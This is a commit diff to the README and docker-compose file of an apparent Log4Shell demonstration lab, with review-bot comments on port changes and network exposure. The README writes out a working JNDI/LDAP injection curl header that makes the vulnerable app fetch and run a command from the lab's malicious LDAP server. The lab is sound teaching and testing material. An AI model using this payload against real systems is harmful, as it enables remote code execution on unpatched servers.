modified README
root committed Jan 15, 2022
1 parent c56fa4c commit dd25975
Showing 2 changed files with 4 additions and 4 deletions.
6 changes: 3 additions & 3 deletions README.md
@@ -4,16 +4,16 @@
It will deploy 4 containers, an NGINX reverse proxy, an agent-container (the nano-agent), Log4J vulnerable App and Attacker with malicious LDAP.
The LDAP malicious server is builded at moment the creation.

You will reach all the Vulnerable application with the exposed 8080 port from the NGINX server, the default.conf file already redirects all the request to the app.
You will reach all the Vulnerable application with the exposed 80 port from the NGINX server, the default.conf file already redirects all the request to the app.

## Instructions:

* Clone the repository
* From a machine with docker and docker-compose installed, run:
` export TOKEN=<your agent token>`
` docker-compose up `
` from another machine run "curl "docker host ip address":8080" and if you recieve "status":400,"error":"Bad Request","path":"/" as response, the server is properly listening`
` from the same machine now run "curl "docker host ip address":8080 -H 'X-Api-Version: ${jndi:ldap://malicious:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'" this last request inject the LDAP call in the log and the Log4J vulnerable dependency try to execute it, connecting to the malicious server and executing a "touch /tmp/pwned" command`
` from another machine run "curl "http://docker host ip address"" and if you recieve "status":400,"error":"Bad Request","path":"/" as response, the server is properly listening`
` from the same machine now run "curl "http://docker host ip address":8080 -H 'X-Api-Version: ${jndi:ldap://malicious:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'" this last request inject the LDAP call in the log and the Log4J vulnerable dependency try to execute it, connecting to the malicious server and executing a "touch /tmp/pwned" command`
` in the docker host we can run "docker ps" and look for a container with the name log4shell-log4shell grab the ID and run "docker logs -f "ID of container"" you will see the logs of the server when executes the command`
` in the docker host again we can run with the same container ID 'docker exec "ID of container" ls /tmp/' and you will see the file created by the attack`
` docker-compose down `
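
Review bot: the replacement for the exploit step still appends `:8080` (`curl "http://docker host ip address":8080 -H 'X-Api-Version: ...`), while the check step just above it and the intro paragraph were both moved to port 80, and docker-compose.yaml in this same commit now publishes `80:80`. As written, the second curl no longer matches the port the proxy is published on, so the walkthrough breaks at that step; drop the `:8080` there. While touching these lines, consider replacing the quoted `"docker host ip address"` with a single placeholder such as `<docker-host-ip>` so the command can be copied without the stray inner quotes, and fix "recieve" in the two lines that were rewritten anyway.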
2 changes: 1 addition & 1 deletion docker-compose.yaml
@@ -10,7 +10,7 @@ services:
links:
- "log4shell:web"
ports:
- 8080:80
- 80:80
ipc: host
image: checkpoint/infinity-next-nginx
volumes:
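
Review bot: `- 80:80` gives no host address, so the proxy in front of the deliberately vulnerable Log4J app is published on port 80 of every interface of the docker host, and the README does not say the lab must run on an isolated network. Since the instructions need access from another machine, a loopback-only bind is not an option, but the mapping could take an explicit lab interface address (`<lab-interface-ip>:80:80`) or the README could state the isolation requirement next to the `docker-compose up` step. Port 80 is also more likely than 8080 to collide with a web server already running on the host, which is worth a line in the README.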